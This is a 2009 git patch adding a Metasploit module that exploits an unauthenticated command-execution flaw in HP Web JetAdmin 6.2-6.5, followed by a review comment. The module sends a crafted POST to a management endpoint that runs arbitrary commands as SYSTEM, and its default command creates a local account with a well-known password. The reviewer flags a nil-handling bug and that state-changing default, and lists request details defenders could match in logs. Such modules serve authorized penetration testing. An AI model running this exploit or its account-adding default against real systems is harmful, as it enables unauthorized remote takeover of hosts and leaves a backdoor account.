From 5f650c0751ae57152405135ab7e4680e227d2ead Mon Sep 17 00:00:00 2001
From: Patrick Webster
Date: Sat, 19 Sep 2009 00:33:44 +0000
Subject: [PATCH] Added HP Web JetAdmin aux command exec module.
git-svn-id: file:///home/svn/framework3/trunk@7041 4d416f70-5f16-0410-b530-b9f4589650da
---
.../admin/http/hp_web_jetadmin_exec.rb | 61 +++++++++++++++++++
1 file changed, 61 insertions(+)
create mode 100644 modules/auxiliary/admin/http/hp_web_jetadmin_exec.rb
diff --git a/modules/auxiliary/admin/http/hp_web_jetadmin_exec.rb b/modules/auxiliary/admin/http/hp_web_jetadmin_exec.rb
new file mode 100644
index 0000000000..9680c3ccf9
--- /dev/null
+++ b/modules/auxiliary/admin/http/hp_web_jetadmin_exec.rb
@@ -0,0 +1,61 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+
+require 'msf/core'
+
+
+class Metasploit3 < Msf::Auxiliary
+
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'HP Web JetAdmin 6.5 Server Arbitrary Command Execution',
+ 'Description' => %q{
+ This module abuses a command execution vulnerability within the
+ web based management console of the Hewlett-Packard Web JetAdmin
+ network printer tool v6.2 - v6.5. It is possible to execute commands
+ as SYSTEM without authentication. The vulnerability also affects POSIX
+ systems, however at this stage the module only works against Windows.
+ This module does not apply to HP printers.
+ },
+ 'Author' => [ 'patrick' ],
+ 'License' => MSF_LICENSE,
+ 'Version' => '$Revision$',
+ 'References' =>
+ [
+ [ 'OSVDB', '5798' ],
+ [ 'BID', '10224' ],
+ #[ 'CVE', '' ],# No CVE!
+ [ 'URL', 'http://www.milw0rm.com/exploits/294' ],
+ ],
+ 'DisclosureDate' => 'Apr 27 2004'))
+
+ register_options(
+ [
+ Opt::RPORT(8000),
+ OptString.new('CMD', [ false, "The command to execute.", "net user metasploit password /add" ]),
+ ], self.class)
+ end
+
+ def run
+ cmd = datastore['CMD'].gsub(' ', ',')
+
+ send_request_cgi({
+ 'uri' => '/plugins/framework/script/content.hts',
+ 'method' => 'POST',
+ 'data' => 'obj=Httpd:ExecuteFile(,cmd.exe,/c,' + cmd + ',)'
+ }, 3)
+ end
+
+end
+
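Review bot: `CMD` is registered as optional (`false`) but `run` calls `datastore['CMD'].gsub` unconditionally, so an unset option fails with NoMethodError on nil. Its default, `net user metasploit password /add`, also changes state on the tested host: a run with defaults during an authorized assessment leaves behind a local account with a well-known password. I would make the option required and drop the state-changing default, `OptString.new('CMD', [ true, "The command to execute." ]),`, and add a sentence to the description telling the operator to remove whatever the command created. The return value of `send_request_cgi` is discarded in `run`, so a comment such as `# Response is not inspected; the result must be confirmed out of band` would make that limitation explicit. The description could also state that the request is an unauthenticated POST to `/plugins/framework/script/content.hts` with an `obj=Httpd:ExecuteFile(` body, which is what a defender would match in web server logs.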